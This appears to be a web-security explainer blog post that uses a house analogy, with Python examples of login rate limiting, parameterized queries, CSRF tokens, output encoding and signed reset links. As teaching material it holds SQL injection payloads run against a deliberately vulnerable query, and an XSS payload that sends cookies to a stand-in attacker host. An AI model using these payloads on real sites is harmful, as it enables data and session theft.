Home Kitchen

Secure your web app like your own home

An easy way to understand web application security is to imagine your own home. It has a front door, a back door, windows, several rooms, a roof, perimeter fences and different access routes. Only the terminology is different.

The front door.
The front door of any web application is the login page and, unsurprisingly, it is the main point of attack. A login page consists of fields for a username and a password and a button that sends them to the server, which authenticates you before granting access to the rest of the application. Some login pages add a captcha to check that a human is filling in the form rather than a script, because an attacker can reproduce the same form on their own machine and have it submit one username and password combination after another until a pair is accepted. This automated guessing is a brute-force attack (or credential stuffing, when the pairs come from passwords leaked elsewhere) and is the equivalent of a thief trying a bag of copied keys in your lock.

Captchas are images of distorted letters and numbers that an automated script cannot easily read. Unfortunately, as scripts get better at reading these images, the captchas have to become more distorted and harder for humans to read too. This frustrates the end user, who fails repeatedly to get into their own account because the captcha was unreadable. Captchas are therefore usually backed up by controls on the server: counting failed attempts per account and per source address, slowing the response after each failure, and temporarily locking an account that keeps failing, so that a script gets only a handful of guesses. A separate control, the secure token, protects the form itself. The server generates a random value for each session, remembers it and embeds it as a hidden field in the form; a submission whose hidden value does not match the remembered one is rejected. This stops a copy of the form hosted on another site from submitting on the user's behalf, but on its own it does not stop password guessing, because the attacker's script can fetch a fresh form, and a fresh token, before every attempt.
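The attempt-limiting control described above, as an added example rather than code from the original post. It assumes a constructed user table (one user, a salted SHA-256 digest for illustration only; a real deployment would use a slow password hash such as bcrypt or Argon2) and an injectable clock so the lockout can be exercised without waiting. Both the account name and the client address are limited, so one attacker hammering one account and one attacker spraying many accounts are both cut off.

```python
import hashlib
import hmac
import time
from collections import defaultdict, deque

MAX_FAILURES = 5        # failed attempts allowed within WINDOW_SECONDS
WINDOW_SECONDS = 300    # sliding window in which failures are counted
LOCKOUT_SECONDS = 900   # how long a key stays locked once the limit is hit


class AttemptLimiter:
    """Counts failed logins per key (an account name or a client address)
    and locks the key after MAX_FAILURES failures inside the sliding window."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                  # injectable for testing
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> time the lock expires

    def is_locked(self, key):
        until = self.locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:           # lock has expired: start afresh
            del self.locked_until[key]
            self.failures[key].clear()
            return False
        return True

    def record_failure(self, key):
        now = self.clock()
        recent = self.failures[key]
        recent.append(now)
        while recent and now - recent[0] > WINDOW_SECONDS:   # forget old failures
            recent.popleft()
        if len(recent) >= MAX_FAILURES:
            self.locked_until[key] = now + LOCKOUT_SECONDS

    def record_success(self, key):
        self.failures[key].clear()


# Constructed user table for the example (assumption, not a real store).
def _digest(salt, password):
    return hashlib.sha256(salt + password.encode()).hexdigest()


_SALT = b"example-salt"
USERS = {"alice": _digest(_SALT, "correct horse battery staple")}


def login(limiter, username, password, client_ip):
    """Returns 'ok', 'denied' or 'locked'."""
    keys = (f"user:{username}", f"ip:{client_ip}")
    if any(limiter.is_locked(k) for k in keys):
        return "locked"
    # Compute the digest even for unknown users so the response time does
    # not reveal whether the username exists; compare_digest keeps the
    # comparison time independent of how many characters match.
    candidate = _digest(_SALT, password)
    stored = USERS.get(username)
    if stored is not None and hmac.compare_digest(stored, candidate):
        for k in keys:
            limiter.record_success(k)
        return "ok"
    for k in keys:
        limiter.record_failure(k)
    return "denied"


if __name__ == "__main__":
    limiter = AttemptLimiter()
    for guess in ("password", "123456", "letmein", "qwerty", "welcome", "correct horse battery staple"):
        print(guess, "->", login(limiter, "alice", guess, "203.0.113.7"))
```

Run stand-alone, the script shows five guesses being denied and the sixth, correct, password being refused with "locked": once the limit is reached the right key no longer opens the door until the lockout expires.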

The windows and the back door.
What are the windows of a web application? I don’t mean the operating system on the server. I’m talking about the areas of each page that could be broken to force an entry: the edit boxes and text areas that allow the user to type information. An attacker will type commands that the database understands into these fields. If the software builds its database queries by pasting the typed text directly into the query, the database cannot tell the user's data from the command, and it executes whatever the attacker supplied. Typical results are destruction of data, theft of data or exposure of other users' information. This type of attack is known as SQL injection. The fix is to keep data and commands apart: pass user input to the database as a parameter of a prepared statement instead of pasting it into the query text.
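The broken window beside the fixed one, as an added example rather than code from the original post. It uses Python's built-in sqlite3 module against a constructed in-memory table (two users, placeholder password hashes) and shows the same lookup written two ways: the vulnerable version pastes the typed text into the query, the safe version passes it as a bound parameter. The payloads in the `__main__` demo are the classic "always true" condition and a UNION that reads the password column out of the same table.

```python
import sqlite3


def make_db():
    """Constructed sample database for the example (assumption, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, username):
    """The typed text becomes part of the SQL text, so a quote in the input
    ends the string and the rest of the input is executed as SQL."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """The typed text travels as a bound parameter: the query's structure is
    fixed before the database ever sees the value, so it is only ever data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs used by the demo.
ALWAYS_TRUE = "x' OR '1'='1"
DUMP_HASHES = "x' UNION SELECT username, password_hash FROM users --"


if __name__ == "__main__":
    db = make_db()
    for payload in (ALWAYS_TRUE, DUMP_HASHES):
        print("input:      ", payload)
        print("vulnerable: ", find_user_vulnerable(db, payload))
        print("safe:       ", find_user_safe(db, payload))
```

Against the vulnerable function the first payload returns every user and the second returns every user's password hash; against the safe function both return nothing, because no user is literally named `x' OR '1'='1`. sqlite3 refuses to run more than one statement per `execute` call, which is why a `'; DROP TABLE users; --` payload fails here with an error rather than destroying the table; on a database driver that allows stacked statements it would succeed.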

Border fences.
The boundaries of a web page are its links, its editable areas and the URL of the page itself, and three different attacks live along this fence. The URL and the links embedded in the page can be copied onto another site and modified so that, when a logged-in user is tricked into following them, the server carries out the attacker's request with that user's rights; this is cross-site request forgery (CSRF). JavaScript can be typed into editable areas so that it is stored and later runs in other users' browsers, sending their data to an unauthorised site or taking control of their browser session; this is cross-site scripting (XSS), so called because the attacker's script runs on your site, not theirs. Database commands can also be placed in the parameters of the main URL, which is simply SQL injection through a different window. An XSS attack is typically used to steal a user's authenticated session ID; the attacker then presents that ID to the server, is treated as the victim (an administrator, say) and uses that access to raise the privileges of an account they have already created.

To prevent cross-site scripting, the software must treat everything typed into editable areas as text, not code: encode it before placing it in a page so that the browser displays it rather than runs it. To prevent request forgery, include a secure token in every form and every link that changes data, and reject requests that arrive without the matching token. Just as holes and gaps in fences should be closed, every protected page must verify that an authenticated user is present before doing anything else.
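The three fence repairs in one place, as an added example rather than code from the original post; it also covers the hidden-field token described under the front door above, since it is the same mechanism. It assumes a constructed `Session` object standing in for whatever the server's session cookie points at, a comment form as the editable area, and an in-process list as the comment store. The handler checks for a logged-in user first, then the CSRF token, and only then stores the comment; rendering uses `html.escape` so a stored `<script>` tag is shown as text.

```python
import hmac
import html
import secrets


class Session:
    """Constructed stand-in for a server-side session (assumption for the
    example); a real app looks this up from the session cookie."""

    def __init__(self, user):
        self.user = user
        # Random, unguessable and bound to this session only.
        self.csrf_token = secrets.token_urlsafe(32)


def render_comment_form(session, action="/comment"):
    """The token travels as a hidden field. A copy of this form on another
    site cannot know the value, so its submissions fail handle_comment_post."""
    return (
        f'<form method="post" action="{html.escape(action, quote=True)}">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<textarea name="body"></textarea><button>Post</button></form>'
    )


def render_comment_unsafe(author, body):
    """Before the fix: the typed text is placed in the page exactly as typed."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    """After the fix: encode the text so the browser shows '<script>'
    as four characters instead of running it."""
    return (
        f"<p><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</p>"
    )


COMMENTS = []   # (author, raw text); encoding happens on output, not storage


def handle_comment_post(session, form):
    """Server-side handler for the form. Returns (HTTP status, body)."""
    if session is None:                       # no authenticated user: stop here
        return 401, "login required"
    submitted = form.get("csrf_token", "")
    # compare_digest needs bytes of equal encoding; constant-time comparison
    # keeps the check from leaking how much of the token was guessed.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403, "missing or wrong CSRF token"
    body = form.get("body", "")
    COMMENTS.append((session.user, body))
    return 200, render_comment_safe(session.user, body)


if __name__ == "__main__":
    # Constructed XSS payload that would post the session cookie elsewhere.
    payload = "<script>fetch('//attacker.example/?c=' + document.cookie)</script>"
    s = Session("alice")
    print(handle_comment_post(None, {"body": payload}))
    print(handle_comment_post(s, {"body": payload}))                 # no token
    print(handle_comment_post(s, {"csrf_token": "guess", "body": payload}))
    print(handle_comment_post(s, {"csrf_token": s.csrf_token, "body": payload}))
    print("unsafe rendering:", render_comment_unsafe("alice", payload))
```

The hidden token must never be placed in a URL that ends up in a referrer header or a browser history, and it is compared with a constant-time function for the same reason passwords are. Encoding on output rather than on input matters because the same stored text may later be placed in HTML, in JSON or in a URL, and each needs a different encoding.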

Impersonation.
We have all had bogus callers at the door claiming to be from the gas board or the water company and saying they need access to shut off the supply. Website attackers can contact you or any other user of your site by email, social network or phone and trick you into revealing your login details. The story might be that your website has already been hacked and they can fix it if you give them access. The only prevention is to remind your users constantly not to reveal their username and password to anyone, and that you, as the owner of the site, will never ask them for their password. You should also give users a way to reset a forgotten password: email them a link containing a random, single-use token that expires after a short time, so that only someone who controls that mailbox can complete the reset and the link cannot be forged or reused.
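The reset-link token just described, as an added example rather than code from the original post. It assumes a server-side secret held only by the server (generated at import time here for the sake of a stand-alone script; in practice it comes from configuration) and an in-process dictionary of outstanding tokens. The token carries the user, an expiry time and a random nonce, signed with HMAC-SHA256 so that a link not issued by this server is rejected; the nonce is removed on first use so the link cannot be replayed. Times are passed in explicitly so the expiry can be tested.

```python
import base64
import hashlib
import hmac
import secrets
import time

# Assumption for the example: a 32-byte secret that never leaves the server.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_LIFETIME = 15 * 60   # seconds a reset link stays valid
_outstanding = {}          # nonce -> user id; removed once the token is used


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_reset_token(user_id, now=None):
    """Builds the token placed in the emailed link: user, expiry and a random
    nonce, signed with the server secret so nobody else can forge one."""
    now = int(time.time()) if now is None else int(now)
    nonce = secrets.token_urlsafe(16)
    payload = f"{user_id}:{now + TOKEN_LIFETIME}:{nonce}".encode()
    signature = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    _outstanding[nonce] = user_id
    return _b64(payload) + "." + _b64(signature)


def verify_reset_token(token, now=None):
    """Returns the user id the token belongs to, or None if the token is
    malformed, forged, expired or has already been used."""
    now = int(time.time()) if now is None else int(now)
    try:
        payload_part, sig_part = token.split(".", 1)
        payload = _unb64(payload_part)
        signature = _unb64(sig_part)
        # rsplit from the right so a user id containing ':' still parses
        user_id, expires, nonce = payload.decode().rsplit(":", 2)
        expires = int(expires)
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        return None        # not issued by this server, or tampered with
    if now > expires:
        return None        # link too old
    if _outstanding.pop(nonce, None) != user_id:
        return None        # already used, or never issued
    return user_id


if __name__ == "__main__":
    token = issue_reset_token("alice")
    print("link: https://example.invalid/reset?token=" + token)   # assumed URL shape
    print("first use:", verify_reset_token(token))
    print("second use:", verify_reset_token(token))
```

Putting the expiry inside the signed payload means the server does not have to store it, and checking the signature before anything else means an attacker cannot use the expiry or nonce checks to probe the system with forged tokens. The remaining step, actually changing the password, should also invalidate every other outstanding token and session for that user.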

Brute force input.
The simplest and fastest way for a burglar to enter a home is to pry open a door with a crowbar or put a brick through a window.
The high-tech version of this is the denial-of-service (DoS) attack. The attacker sends requests to a page faster than the server can answer them until it runs out of memory, connections or processing time and stops responding to legitimate users; when the requests come from many machines at once it is a distributed denial of service (DDoS), and no single source can simply be blocked.

While the number of thieves may be falling, the number of attackers is rising. A thief usually wants only financial gain, whereas an attacker's motivation may be political, financial or simply malicious damage. A thief may never get round to an unprotected house, but an unsecured website will certainly be attacked eventually, because automated scanners try every address on the internet.
